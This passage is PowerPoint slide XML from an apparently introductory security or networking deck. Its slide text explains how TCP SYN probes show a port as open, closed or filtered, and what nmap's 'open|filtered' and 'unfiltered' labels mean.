          <p:cNvPr id="10" name="Shape 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="868680" y="3127248"/>
            <a:ext cx="0" cy="320040"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="822960" y="3520440"/>
            <a:ext cx="3017520" cy="256032"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9E95B8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>you get back</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Text 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="822960" y="3776472"/>
            <a:ext cx="3017520" cy="365760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5EE28A"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>SYN / ACK</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Text 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="822960" y="4224528"/>
            <a:ext cx="3017520" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" spc="150" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5EE28A"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>OPEN</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Text 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="822960" y="4526280"/>
            <a:ext cx="3063240" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1600"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9E95B8"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Something is listening and it wants to talk</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Shape 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4343400" y="2057400"/>
            <a:ext cx="3593592" cy="2926080"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 2188"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="150D26"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Text 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4617720" y="2286000"/>
            <a:ext cx="3017520" cy="256032"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9E95B8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>you send</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Text 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4617720" y="2542032"/>
            <a:ext cx="3017520" cy="365760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>SYN</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Shape 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4663440" y="3127248"/>
            <a:ext cx="0" cy="320040"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Text 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4617720" y="3520440"/>
            <a:ext cx="3017520" cy="256032"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9E95B8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>you get back</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Text 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4617720" y="3776472"/>
            <a:ext cx="3017520" cy="365760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF6B6B"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>RST</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Text 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4617720" y="4224528"/>
            <a:ext cx="3017520" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" spc="150" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF6B6B"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>CLOSED</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Text 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4617720" y="4526280"/>
            <a:ext cx="3063240" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1600"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9E95B8"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>The host is up, nothing is listening on that port</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Shape 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8138160" y="2057400"/>
            <a:ext cx="3593592" cy="2926080"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 2188"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="150D26"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Text 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8412480" y="2286000"/>
            <a:ext cx="3017520" cy="256032"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9E95B8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>you send</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Text 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8412480" y="2542032"/>
            <a:ext cx="3017520" cy="365760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>SYN</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Shape 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8458200" y="3127248"/>
            <a:ext cx="0" cy="320040"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Text 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8412480" y="3520440"/>
            <a:ext cx="3017520" cy="256032"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9E95B8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>you get back</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Text 25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8412480" y="3776472"/>
            <a:ext cx="3017520" cy="365760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F2C94C"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>nothing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Text 26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8412480" y="4224528"/>
            <a:ext cx="3017520" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" spc="150" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F2C94C"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>FILTERED</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Text 27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8412480" y="4526280"/>
            <a:ext cx="3063240" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1600"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9E95B8"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>A firewall ate the packet. You learn nothing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Text 28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566928" y="5138928"/>
            <a:ext cx="7315200" cy="237744"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" spc="120" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>TWO MORE WORDS YOU WILL SEE IN THE OUTPUT</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Shape 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="5468112"/>
            <a:ext cx="5440680" cy="777240"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 8235"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="150D26"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Text 30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="804672" y="5550408"/>
            <a:ext cx="4937760" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F2C94C"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>open|filtered</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Text 31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="804672" y="5870448"/>
            <a:ext cx="5029200" cy="320040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>nmap cannot tell which one it is. Normal for UDP.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Shape 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6199632" y="5468112"/>
            <a:ext cx="5120640" cy="777240"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 8235"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="150D26"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Text 33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6455664" y="5550408"/>
            <a:ext cx="4937760" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9E95B8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>unfiltered</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="Text 34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6455664" y="5870448"/>
            <a:ext cx="5029200" cy="320040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
